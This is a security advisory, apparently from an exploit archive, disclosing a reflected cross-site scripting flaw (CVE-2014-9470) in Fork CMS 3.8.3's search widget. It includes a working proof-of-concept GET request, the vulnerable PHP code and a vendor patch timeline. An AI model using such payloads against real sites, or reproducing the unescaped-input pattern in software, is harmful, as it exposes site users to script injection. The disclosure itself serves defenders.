Fork CMS 3.8.3 Cross Site Scripting

`# Exploit Title: XSS Vulnerability in Fork CMS 3.8.3  
  
# Google Dork: N/A  
  
# Date: 12/26/2014  
  
# Exploit Author: Le Ngoc phi ([email protected]) and ITAS Team (www.itas.vn)  
  
# Vendor Homepage: http://www.fork-cms.com  
  
# Software Link: http://www.fork-cms.com/blog/detail/fork-3.8.4-released  
  
# Version: Fork 3.8.3  
  
# Tested on: N/A  
  
# CVE : CVE-2014-9470   
  
  
  
  
  
::VULNERABILITY DETAIL::  
  
- Vulnerable parameter: q_widget  
  
- Vulnerable file: src/Frontend/Modules/Search/Actions/Index.php  
  
- Vulnerable function: loadForm()  
  
  
  
- Attack vector:   
  
  
  
GET  
/en/search?form=search&q_widget="onmouseover="alert('XSS')"&submit=Search  
HTTP/1.1  
  
Host: forkcms.local  
  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101  
Firefox/34.0  
  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
  
Accept-Language: en-US,en;q=0.5  
  
Accept-Encoding: gzip, deflate  
  
Cookie: track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B;  
__utma=23748525.1232410121.1415937482.1419392332.1419480017.3;  
__utmz=23748525.1419480017.3.3.utmcsr=google|utmccn=(organic)|utmcmd=organic  
|utmctr=(not%20provided);  
track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B;  
frontend_language=s%3A2%3A%22en%22%3B; _ga=GA1.2.1232410121.1415937482;  
PHPSESSID=gailpg881ubvtsmroh2p1bfqn5  
  
Connection: keep-alive  
  
  
  
- Vulnerable code:  
  
private function loadForm()  
  
{  
  
// create form  
  
$this->frm = new FrontendForm('search', null, 'get', null, false);  
  
  
  
// could also have been submitted by our widget  
  
if (!\SpoonFilter::getGetValue('q', null, '')) {  
  
$_GET['q'] = \SpoonFilter::getGetValue('q_widget', null, '');  
  
}  
  
  
  
// create elements  
  
$this->frm->addText(  
  
'q',  
  
null,  
  
255,  
  
'inputText liveSuggest autoComplete',  
  
'inputTextError liveSuggest autoComplete'  
  
);  
  
  
  
// since we know the term just here we should set the canonical url  
here  
  
$canonicalUrl = SITE_URL .  
FrontendNavigation::getURLForBlock('Search');  
  
if (isset($_GET['q']) && $_GET['q'] != '') {  
  
$canonicalUrl .= '?q=' . $_GET['q'];  
  
}  
  
$this->header->setCanonicalUrl($canonicalUrl);  
  
}  
  
  
  
  
  
  
  
::DISCLOSURE::  
  
- 12/25/2014: Detected vulnerability  
  
- 12/25/2014: Inform vendor and the vendor confirmed  
  
- 12/26/2014: Vendor releases patch  
  
- 12/26/2014: ITAS Team publishes information  
  
  
  
::REFERENCE::  
  
-  
http://www.itas.vn/news/itas-team-found-out-a-cross-site-scripting-vulnerabi  
lity-in-fork-cms-70.html  
  
- https://github.com/forkcms/forkcms/issues/1018s  
  
-  
https://github.com/forkcms/forkcms/commit/4a7814762adf4f56f932d95146c7e4126d  
872114  
  
  
  
::DISCLAIMER::  
  
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF  
ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY  
IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE  
OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS  
A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION  
OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS,  
AND AT THE USER'S OWN RISK.  
  
  
----------------------------------------------------------------------------  
----------------  
  
ITAS Team  
  
  
ITAS Corp. Be protected with us   
Office : 24 Dang Thai Mai St., Ward 7, Phu Nhuan District, HCMC.  
Tel : +84 - 8 - 38931952 Hotline :  
0903445711  
Email : <mailto:[email protected]> [email protected]  
<http://www.itas.vn/> www.itas.vn  
  
  
  
  
  
  
  
`